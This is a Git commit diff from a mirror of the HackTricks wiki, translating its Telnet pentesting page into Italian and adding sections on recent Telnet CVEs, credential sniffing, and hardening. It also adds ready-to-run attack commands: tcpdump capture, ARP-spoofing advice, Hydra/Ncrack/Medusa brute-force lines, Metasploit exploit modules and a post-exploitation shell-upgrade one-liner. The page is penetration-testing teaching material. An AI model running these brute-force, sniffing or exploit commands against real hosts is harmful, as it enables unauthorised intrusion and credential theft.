maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/network-services-pentesting/pentesting-telnet.md'] to i

Browse Source
This commit is contained in:
Translator 2025-07-13 21:24:50 +00:00
parent 726e5b4a3c
commit 81b080bfe2
1 changed files with 58 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

60
src/network-services-pentesting/pentesting-telnet.md
View File

@ -23,7 +23,7 @@ nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>
```
Lo script `telnet-ntlm-info.nse` otterrà informazioni NTLM (versioni di Windows).
Dalla [telnet RFC](https://datatracker.ietf.org/doc/html/rfc854): Nel protocollo TELNET ci sono varie "**opzioni**" che saranno sanzionate e possono essere utilizzate con la struttura "**DO, DON'T, WILL, WON'T**" per consentire a un utente e a un server di concordare l'uso di un insieme più elaborato (o forse semplicemente diverso) di convenzioni per la loro connessione TELNET. Tali opzioni potrebbero includere la modifica del set di caratteri, la modalità di eco, ecc.
Dalla [telnet RFC](https://datatracker.ietf.org/doc/html/rfc854): Nel protocollo TELNET ci sono varie "**opzioni**" che saranno sanzionate e possono essere utilizzate con la struttura "**DO, DON'T, WILL, WON'T**" per consentire a un utente e a un server di concordare l'uso di un insieme di convenzioni più elaborate (o forse semplicemente diverse) per la loro connessione TELNET. Tali opzioni potrebbero includere la modifica del set di caratteri, la modalità di eco, ecc.
**So che è possibile enumerare queste opzioni, ma non so come, quindi fammi sapere se sai come.**
@ -67,4 +67,60 @@ Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit'
```
{{#include ../banners/hacktricks-training.md}}
### Recent Vulnerabilities (2022-2025)
* **CVE-2024-45698 D-Link Wi-Fi 6 routers (DIR-X4860)**: Il servizio Telnet integrato accettava credenziali hard-coded e non riusciva a sanitizzare l'input, consentendo RCE remota non autenticata come root tramite comandi creati su porta 23. Risolto nel firmware ≥ 1.04B05.
* **CVE-2023-40478 NETGEAR RAX30**: Un overflow del buffer basato su stack nel comando `passwd` della CLI Telnet consente a un attaccante adiacente di bypassare l'autenticazione ed eseguire codice arbitrario come root.
* **CVE-2022-39028 GNU inetutils telnetd**: Una sequenza di due byte (`0xff 0xf7` / `0xff 0xf8`) attiva un dereferenziamento di puntatore NULL che può far crashare `telnetd`, risultando in un DoS persistente dopo diversi crash.
Tieni a mente questi CVE durante la triage delle vulnerabilità—se il target sta eseguendo un firmware non patchato o un demone Telnet inetutils legacy potresti avere un percorso diretto per l'esecuzione di codice o un DoS dirompente.
### Sniffing Credentials & Man-in-the-Middle
Telnet trasmette tutto, comprese le credenziali, in **clear-text**. Due modi rapidi per catturarle:
```bash
# Live capture with tcpdump (print ASCII)
sudo tcpdump -i eth0 -A 'tcp port 23 and not src host $(hostname -I | cut -d" " -f1)'
# Wireshark display filter
tcp.port == 23 && (telnet.data || telnet.option)
```
Per MITM attivo, combina l'ARP spoofing (ad es. `arpspoof`/`ettercap`) con gli stessi filtri di sniffing per raccogliere password su reti switchate.
### Forza bruta automatizzata / Spraying di password
```bash
# Hydra (stop at first valid login)
hydra -L users.txt -P rockyou.txt -t 4 -f telnet://<IP>
# Ncrack (drop to interactive session on success)
ncrack -p 23 --user admin -P common-pass.txt --connection-limit 4 <IP>
# Medusa (parallel hosts)
medusa -M telnet -h targets.txt -U users.txt -P passwords.txt -t 6 -f
```
La maggior parte delle botnet IoT (varianti di Mirai) scansiona ancora la porta 23 con piccoli dizionari di credenziali predefiniti—rispecchiare questa logica può identificare rapidamente dispositivi deboli.
### Sfruttamento & Post-Sfruttamento
Metasploit ha diversi moduli utili:
* `auxiliary/scanner/telnet/telnet_version` enumerazione di banner e opzioni.
* `auxiliary/scanner/telnet/brute_telnet` bruteforce multithreaded.
* `auxiliary/scanner/telnet/telnet_encrypt_overflow` RCE contro Telnet vulnerabile di Solaris 9/10 (gestione dell'opzione ENCRYPT).
* `exploit/linux/mips/netgear_telnetenable` abilita il servizio telnet con un pacchetto creato su molti router NETGEAR.
Dopo aver ottenuto una shell, ricorda che **TTY sono solitamente stupidi**; aggiorna con `python -c 'import pty;pty.spawn("/bin/bash")'` o usa i [trucchi TTY di HackTricks](/generic-hacking/reverse-shells/full-ttys.md).
### Indurimento & Rilevamento (angolo del team blu)
1. Preferisci SSH e disabilita completamente il servizio Telnet.
2. Se Telnet è necessario, collegalo solo a VLAN di gestione, applica ACL e avvolgi il demone con TCP wrappers (`/etc/hosts.allow`).
3. Sostituisci le implementazioni legacy di `telnetd` con `ssl-telnet` o `telnetd-ssl` per aggiungere crittografia del trasporto, ma **questo protegge solo i dati in transito—indovinare le password rimane banale**.
4. Monitora il traffico in uscita sulla porta 23; le compromissioni spesso generano shell inverse su Telnet per bypassare filtri egressi HTTP rigorosi.
## Riferimenti
* D-Link Advisory CVE-2024-45698 RCE Telnet Critico.
* NVD CVE-2022-39028 inetutils `telnetd` DoS.
{{#include /banners/hacktricks-training.md}}